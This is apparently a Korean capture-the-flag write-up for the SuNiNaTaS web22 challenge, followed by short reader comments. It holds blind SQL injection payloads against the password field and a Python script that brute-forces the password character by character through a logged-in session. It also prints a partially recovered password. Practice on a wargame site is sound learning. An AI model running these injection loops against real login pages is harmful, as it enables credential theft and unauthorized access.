admin' and(substring(pw,1,1)='a')--
OK admin
http://www.suninatas.com/Part_one/web22/web22.asp?id=admin' and(substring(pw,1,1)='a')--&pw=1
http://www.suninatas.com/Part_one/web22/web22.asp?id=guest%27+and%28substring%28pw%2C1%2C1%29%3D%27g%27%29--&pw=1
>>> import urllib.request
>>> resp = urllib.request.urlopen("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> resp.read()
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~"
>>> param = "id=admin' and(substring(pw,1,1)='a')--&pw=1"
====
1. 로그인 세션 유지 (CookieJar에 쿠키를 보관해서 이후 요청에 같이 보낸다)
>>> import http.cookiejar
>>> import urllib.request
>>> import urllib.parse
>>>
>>> cj = http.cookiejar.CookieJar()
>>> opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
>>> resp = opener.open("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> print(resp.read())
b'\r\n<script language="javascript">\r\n\tvar auth1 = "1";\r\n\tvar auth = auth1*1;\r\n\r\n\tif (auth == "0"){\r\n\t\talert("Plese Login First!");\r\n\t\tparent.document.location.href="../member/mem_action.asp?licen=login_out";\r\n\t}else{\r\n\t\talert("Welcome To SuNiNaTaS!");\r\n\t\tparent.document.location.href="../main/main.asp";\r\n\t}\r\n</script>'
2. bytes를 문자열(str)로 변환 — resp.read()는 bytes를 반환하므로 decode가 필요하다
str.decode('utf-8')
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~[]?;:'><.,`/{}"
>>> param1 = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C1%2C1%29%3D%27'
>>> param2 = '%27%29--&pw=1'
>>>
admin' and(substring(pw,n,1)=words[i])--
admin' and(substring(pw,1,1)='a')--
N1
N1c3Bilnl
3. 특수문자는 URL 인코딩(percent-encoding)해서 보내야 한다.
urllib.error.HTTPError: HTTP Error 406: Not Acceptable
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$^&*()_+-~[]?:'><.,/{}"
>>> numbers="123456789"
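# Boolean-based blind check against the wargame's web22 challenge, one
# character position at a time. Uses names defined earlier in this session:
# `opener` (cookie-aware opener that holds the login session), `words`
# (candidate characters), `numbers` (1-based positions as digit characters)
# and `param2` (the URL-encoded tail of the request).
#
# NOTE(review): the oracle presumably exists because the `id` parameter is
# concatenated into the server's SQL statement; a parameterized query on the
# server side would remove it.
for position in numbers:
    # Iterate over `numbers` directly: the original range(10) read numbers[9]
    # on a 9-character string and ended the run with an IndexError.
    for candidate in words:
        # Encoded form of: id=admin' and(substring(pw,<position>,1)='<candidate>')--
        # NOTE(review): `candidate` is inserted without percent-encoding, so
        # characters that are special in a query string (e.g. '&', '+') do not
        # reach the server as literals and a match on them cannot be observed.
        full_param = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C'+position+'%2C1%29%3D%27'+candidate+param2
        # Close each response explicitly instead of leaving one open
        # connection per probe.
        with opener.open(full_param) as resp:
            # read() returns bytes; decode before searching for the marker.
            # Local names avoid rebinding the builtin `str` in the session.
            body = resp.read().decode('utf-8')
        # The page answers with "OK" when the injected condition is true.
        if 'OK' in body:
            print(candidate)
            # Stop at the first match and move on to the next position.
            break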
이야 빡고수시네 ㄷㄷ
제 2의 ㅎㅇ 이가 되기 위해서 공부하고있습니다
우와! 멋저요! 나이스 러드윙스님!!!
감댜합니다